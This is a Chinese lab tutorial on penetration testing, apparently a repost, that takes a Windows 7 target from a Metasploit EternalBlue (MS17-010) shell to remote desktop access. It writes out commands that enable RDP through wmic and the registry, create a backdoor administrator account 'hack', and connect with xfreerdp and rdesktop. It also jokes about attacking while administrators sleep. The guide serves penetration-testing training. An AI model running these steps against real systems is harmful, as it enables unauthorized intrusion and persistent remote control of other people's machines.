渗透小技巧从getshell到3389端口远程桌面连接靶机

admin 2022年10月18日13:54:15评论141 views字数 1959阅读6分31秒阅读模式

最近更新了一些cobaltstrike和内网的知识,很多兄弟私信说是对这类感兴趣
作者: zangcc

1、靶场环境

1、靶机和攻击机的信息
攻击机:kali-192.168.25.130
靶机:win7-192.168.25.132

渗透小技巧从getshell到3389端口远程桌面连接靶机
渗透小技巧从getshell到3389端口远程桌面连接靶机

2、永恒之蓝漏洞Getshell

msf用ms17_010先简单拿个shell
具体步骤不详细展开,只要msf选择ms17_010_eternalblue模块,设置rhost参数就行,rhost就是目标靶机的地址。
渗透小技巧从getshell到3389端口远程桌面连接靶机
进来之后,我们就可以在攻击机上面控制win7靶机了,先查看开放的端口有没有3389.

3、命令行打开3389远程连接端口

netstat -an
渗透小技巧从getshell到3389端口远程桌面连接靶机
没开,所以要开一下,首先要看看当前是什么权限,如果是普通用户权限可能不行,需要提权到system最高权限才行。
渗透小技巧从getshell到3389端口远程桌面连接靶机
windows打开3389远程连接的命令有两种办法,任选其一:
wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1
REG ADD HKLMSYSTEMCurrentControlSetControlTerminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
渗透小技巧从getshell到3389端口远程桌面连接靶机
显示successful,再次确认查看远程连接端口是否开启:
netstat -an|find "3389"
渗透小技巧从getshell到3389端口远程桌面连接靶机
显示这样就是监听了。
补充一点
远程桌面的默认端口是3389,为了防止管理员更改了远程端口给我们连接带来意想不到的情况,需要通过查看注册表键值确认远程桌面的端口是否为3389
REG QUERY "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWinStationsRDP-Tcp" /v PortNumber
渗透小技巧从getshell到3389端口远程桌面连接靶机
(0xd3d是16进制的3389)

4、命令行添加登录用户

windows添加用户的命令为:
net user hack 123123 /add
渗透小技巧从getshell到3389端口远程桌面连接靶机
添加进管理员组:
net localgroup administrators hack /add
渗透小技巧从getshell到3389端口远程桌面连接靶机

5、Kali自带远程连接工具进行连接

添加好之后,就可以用工具去连了,这里我目前知道的kali自带工具有xfreerdp,这是公司的大佬介绍给我用的,还有一个是我自己找的,叫做:rdesktop。
现在分别讲讲各自的用法吧:

5.1、xfreerdp工具

①首先是xfreerdp的,命令格式如下:
很容易理解,/u就是用户名,/p是密码,/v是靶机(目标)的地址 /size就是图形化界面的大小而已。
xfreerdp /u:hack /p:123123 /v:192.168.25.132 /size:80%
渗透小技巧从getshell到3389端口远程桌面连接靶机
渗透小技巧从getshell到3389端口远程桌面连接靶机
输入y
渗透小技巧从getshell到3389端口远程桌面连接靶机
按下回车,等待界面出现

5.2、xfreerdp工具

②然后是rdesktop,命令格式很简单:
rdesktop 192.168.25.132
渗透小技巧从getshell到3389端口远程桌面连接靶机
完整输入yes之后,远程成功,如果知道root本机密码的情况下,可以直接用这个账号去登,当然,也可以点其他用户,用刚刚新建的hack账号去登。
渗透小技巧从getshell到3389端口远程桌面连接靶机
如果在真实渗透中,这种做法是相当危害,具体看下图。
渗透小技巧从getshell到3389端口远程桌面连接靶机
“站,是早上打的,银手镯是中午戴的,缝纫机是晚上学会的。”——鲁迅
因为这里只是靶场演示,所以别想那么多,点击是就完事了。
渗透小技巧从getshell到3389端口远程桌面连接靶机
然后,我们看靶机有什么反应,需要点击确定才能断开连接,但是,如果30秒不动,还是能连上去,(所以要趁管理员睡着的时候渗透是比较好的。)
渗透小技巧从getshell到3389端口远程桌面连接靶机
连进来,为所欲为了,纯鼠标无脑操作,比命令行操作方便简单,到此结束。

小记tips

什么时候用远程比较方便呢?
比如一些CTF比赛,要你找系统里的flag,如果用命令行找,很多新手朋友可能不是很会,所以用这种远程的方法鼠标点点点,文件夹翻一翻还是很舒服的,但是呢,如果真实环境渗透,攻防比赛,用远程那是很大风险的,蓝队溯源你是分分钟的事情,而且风险太大,日志会记录行为,抓你只是时间问题,所以我们要遵守《中华人民共和国网络安全法》,做个守法的白帽子。
可能你们会问,有没有又安全,又能新建一个账户,但是呢,管理员还发现不了你的办法。答案是当然有的!只需要用命令行的方法新建一个隐藏的账户就行,但是创建起来没有这次实验那么容易,需要看注册表里的一些信息,稍微有点麻烦,具体方法下次想起来再更,干饭去了。
作者博客: https://wzhihui.blog.csdn.net/
Githubhttps://github.com/zangcc   迎关注支持。

免责声明

郑重声明:本号所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途,否则后果自行承担!

原文始发于微信公众号(安全初心):渗透小技巧从getshell到3389端口远程桌面连接靶机

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年10月18日13:54:15
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   渗透小技巧从getshell到3389端口远程桌面连接靶机https://cn-sec.com/archives/1356804.html

发表评论

匿名网友 填写信息